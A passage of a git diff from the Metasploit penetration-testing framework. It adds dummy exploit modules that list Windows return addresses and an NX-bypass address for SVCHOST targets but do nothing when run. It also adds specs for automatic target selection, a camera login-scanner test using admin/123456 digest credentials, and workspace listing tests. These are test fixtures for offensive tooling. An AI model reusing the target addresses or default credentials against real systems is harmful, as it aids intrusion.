+ }
+ ], # JMP ESI SVCHOST.EXE
+ # Metasploit's NX bypass for XP SP2/SP3
+ ['Windows XP SP3 English (NX)',
+ {
+ 'Ret' => 0x6f88f807,
+ 'DisableNX' => 0x6f8917c2,
+ 'Scratch' => 0x00020408
+ }
+ ]
+
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+
+ deregister_options('RPORT')
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ print_status "Target Selected: #{target.name}"
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/file_fixtures/modules/exploits/existing_auto_target.rb b/spec/file_fixtures/modules/exploits/existing_auto_target.rb
new file mode 100644
index 0000000000..53d23c4692
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/existing_auto_target.rb
@@ -0,0 +1,75 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit With Existing Automatic Target',
+ 'Description' => %q{ This module is a test bed for automatic targeting when there is already an auto target. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }],
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+
+ #
+ # Standard return-to-ESI without NX bypass
+ # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
+ #
+ ['Windows XP SP0/SP1 Universal',
+ {
+ 'Ret' => 0x01001361,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP0 Universal',
+ {
+ 'Ret' => 0x0100129e,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+ # Metasploit's NX bypass for XP SP2/SP3
+ ['Windows XP SP3 English (NX)',
+ {
+ 'Ret' => 0x6f88f807,
+ 'DisableNX' => 0x6f8917c2,
+ 'Scratch' => 0x00020408
+ }
+ ]
+
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/file_fixtures/modules/exploits/single_target_exploit.rb b/spec/file_fixtures/modules/exploits/single_target_exploit.rb
new file mode 100644
index 0000000000..fd5905a479
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/single_target_exploit.rb
@@ -0,0 +1,45 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit With a Single Target',
+ 'Description' => %q{ This module is a test bed for automatic targeting when there is only one target. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb b/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb
new file mode 100644
index 0000000000..a3dcfc60a0
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/bavision_cameras_spec.rb
@@ -0,0 +1,55 @@
+require 'metasploit/framework/login_scanner/bavision_cameras'
+
+RSpec.describe Metasploit::Framework::LoginScanner::BavisionCameras do
+
+ it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: true, has_default_realm: false
+ it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+ subject do
+ described_class.new
+ end
+
+ describe '#digest_auth' do
+ let(:username) { 'admin' }
+ let(:password) { '123456' }
+ let(:response) {
+ {
+ "www-authenticate" => "Digest realm=\"IPCamera Login\", nonce=\"918fee7e0b1126e4c2577911901a181b\", qop=\"auth\""
+ }
+ }
+
+ context 'when a credential is given' do
+ it 'returns a string with username' do
+ expect(subject.digest_auth(username, password, response)).to include('username=')
+ end
+
+ it 'returns a string with realm' do
+ expect(subject.digest_auth(username, password, response)).to include('realm=')
+ end
+
+ it 'returns a string with qop' do
+ expect(subject.digest_auth(username, password, response)).to include('qop=')
+ end
+
+ it 'returns a string with uri' do
+ expect(subject.digest_auth(username, password, response)).to include('uri=')
+ end
+
+ it 'returns a string with nonce' do
+ expect(subject.digest_auth(username, password, response)).to include('nonce=')
+ end
+
+ it 'returns a string with nonce count' do
+ expect(subject.digest_auth(username, password, response)).to include('nc=')
+ end
+
+ it 'returns a string with cnonce' do
+ expect(subject.digest_auth(username, password, response)).to include('cnonce=')
+ end
+
+ it 'returns a string with response' do
+ expect(subject.digest_auth(username, password, response)).to include('response=')
+ end
+ end
+ end
+end
diff --git a/spec/lib/msf/core/exploit/auto_target_spec.rb b/spec/lib/msf/core/exploit/auto_target_spec.rb
new file mode 100644
index 0000000000..65f680063e
--- /dev/null
+++ b/spec/lib/msf/core/exploit/auto_target_spec.rb
@@ -0,0 +1,185 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::AutoTarget do
+
+ include_context 'Msf::DBManager'
+ include_context 'Metasploit::Framework::Spec::Constants cleaner'
+
+ let(:windows_exploit) {
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/auto_target_windows')
+ }
+
+ let(:linux_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/auto_target_linux')
+ }
+
+ let(:auto_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/existing_auto_target')
+ }
+
+ let(:single_exploit){
+ framework.modules.add_module_path(File.join(FILE_FIXTURES_PATH, 'modules'))
+ framework.modules.create('exploit/single_target_exploit')
+ }
+
+ context 'adding an Automatic target' do
+ context 'an exploit without an existing Automatic target' do
+
+ it 'should have an Automatic target added to the top of the list' do
+ first_target = windows_exploit.targets.first
+ expect(first_target.name).to eq 'Automatic'
+ end
+ end
+
+ context 'an exploit with an existing Automatic target' do
+ it 'should not add an extra Automatic Target' do
+ expect(auto_exploit.targets.count).to eq 5
+ end
+ end
+
+ context 'an exploit with only one target' do
+ it 'should not add an automatic target' do
+ expect(single_exploit.targets.count).to eq 1
+ end
+ end
+ end
+
+ describe '#auto_target?' do
+ it 'should return true if the automatic target is selected' do
+ host_addr = '192.168.1.5'
+ host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
+ windows_exploit.datastore['TARGET'] = 0
+ windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
+ windows_exploit.datastore['RHOST'] = host_addr
+ expect(windows_exploit.auto_target?).to be true
+ end
+
+ it 'should return false if the automatic target is not selected' do
+ windows_exploit.datastore['TARGET'] = 1
+ expect(windows_exploit.auto_target?).to be false
+ end
+
+ it 'should return false if the automatic target was added by the module authour' do
+ auto_exploit.datastore['TARGET'] = 0
+ expect(auto_exploit.auto_target?).to be false
+ end
+ end
+
+ context 'finding the target host' do
+ it 'should return a matching Mdm::host if there is one' do
+ host_addr = '192.168.1.5'
+ host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
+ windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
+ windows_exploit.datastore['RHOST'] = host_addr
+ expect(windows_exploit.auto_target_host).to eq host_obj
+ end
+
+ it 'should return nil if there is not one' do
+ windows_exploit.datastore['RHOST'] = '192.168.111.115'
+ expect(windows_exploit.auto_target_host).to be_nil
+ end
+ end
+
+ context 'filtering targets' do
+ let(:windows_xp_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP' ) }
+ let(:windows_xp_sp1_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP1' ) }
+ let(:windows_xp_sp2_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP2' ) }
+ let(:windows_xp_sp3_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP3' ) }
+ let(:windows_7_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows 7' ) }
+ let(:unknown_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: nil ) }
+ let(:potential_targets) { windows_exploit.filter_by_os_family(windows_xp_host) }
+ let(:xp_targets) { windows_exploit.filter_by_os_name(potential_targets,windows_xp_host) }
+
+ context 'by OS family' do
+ it 'should return an array of all matching targets' do
+ expect(windows_exploit.filter_by_os_family(windows_xp_host).count).to eq 4
+ end
+
+ it 'should return an empty array if there are no matches' do
+ expect(linux_exploit.filter_by_os_family(windows_xp_host).count).to eq 0
+ end
+
+ it 'should return nil if the os is unkown on the host' do
+ expect(windows_exploit.filter_by_os_family(unknown_host).count).to eq 0
+ end
+ end
+
+ context 'by OS Name' do
+
+
+ it 'should return an array of matching targets when any exist' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,windows_xp_host)).to eq [potential_targets[1],potential_targets[3]]
+ end
+
+ it 'should return an empty array if there are no matches' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,windows_7_host)).to eq []
+ end
+
+ it 'should return an empty array when there is no OS name' do
+ expect(windows_exploit.filter_by_os_name(potential_targets,unknown_host)).to eq []
+ end
+ end
+
+ context 'by OS Version/Service Pack' do
+ it 'should return an array of matching results if they exist' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,windows_xp_sp1_host)).to eq [xp_targets[0]]
+ end
+
+ it 'should return an empty array if there are no matching results' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,windows_xp_sp2_host)).to eq []
+ end
+
+ it 'should return an empty array if there is no SP' do
+ expect(windows_exploit.filter_by_os_sp(potential_targets,unknown_host)).to eq []
+ end
+
+ end
+
+ context '#filter_by_os' do
+ it 'should return an array of matching targets' do
+ expect(windows_exploit.filter_by_os(windows_xp_sp1_host)).to eq [xp_targets[0]]
+ end
+
+ it 'should fall back to previous filter levels if a more strict filter did not return results' do
+ expect(windows_exploit.filter_by_os(windows_xp_host)).to eq xp_targets
+ end
+ end
+
+ context '#select_target' do
+ it 'should return the matching target on a precise match' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_sp1_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_sp1_host.address
+ expect(windows_exploit.select_target).to eq xp_targets[0]
+ end
+
+ it 'should return the first match on a less precise match' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_host.address
+ expect(windows_exploit.select_target).to eq xp_targets[0]
+ end
+ end
+
+ context '#auto_targeted_index' do
+ it 'should return the index of the selected target' do
+ windows_exploit.datastore['WORKSPACE'] = windows_xp_sp1_host.workspace.name
+ windows_exploit.datastore['RHOST'] = windows_xp_sp1_host.address
+ expect(windows_exploit.auto_targeted_index).to eq 2
+ end
+
+ it 'should return nil if it does not find a match' do
+ windows_exploit.datastore['WORKSPACE'] = unknown_host.workspace.name
+ windows_exploit.datastore['RHOST'] = unknown_host.address
+ expect(windows_exploit.auto_targeted_index).to eq nil
+ end
+ end
+
+ end
+
+
+
+
+
+end
\ No newline at end of file
diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index f1f9ad153e..4900729224 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -394,7 +394,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
" -n,--name Change the name of a host",
" -m,--comment Change the comment of a host",
" -t,--tag Add or specify a tag to a range of hosts",
- "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags"
+ "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags"
]
end
end
@@ -542,6 +542,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
db.cmd_workspace "-D"
@output = []
end
+
describe "" do
it "should list default workspace" do
db.cmd_workspace
@@ -561,6 +562,35 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
end
end
+ describe "-v" do
+ it "should list default workspace verbosely" do
+ db.cmd_workspace("-v")
+ expect(@output).to match_array [
+ "",
+ "Workspaces",
+ "==========",
+ "current name hosts services vulns creds loots notes",
+ "------- ---- ----- -------- ----- ----- ----- -----",
+ "* default 0 0 0 0 0 0"
+ ]
+ end
+
+ it "should list all workspaces verbosely" do
+ db.cmd_workspace("-a", "foo")
+ @output = []
+ db.cmd_workspace("-v")
+ expect(@output).to match_array [
+ "",
+ "Workspaces",
+ "==========",
+ "current name hosts services vulns creds loots notes",
+ "------- ---- ----- -------- ----- ----- ----- -----",
+ " default 0 0 0 0 0 0",
+ "* foo 0 0 0 0 0 0"
+ ]
+ end
+ end
+
describe "-a" do
it "should add workspaces" do
db.cmd_workspace("-a", "foo", "bar", "baf")
@@ -603,6 +633,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
expect(@output).to match_array [
"Usage:",
" workspace List workspaces",
+ " workspace -v List workspaces verbosely",
" workspace [name] Switch workspace",
" workspace -a [name] ... Add workspace(s)",
" workspace -d [name] ... Delete workspace(s)",
|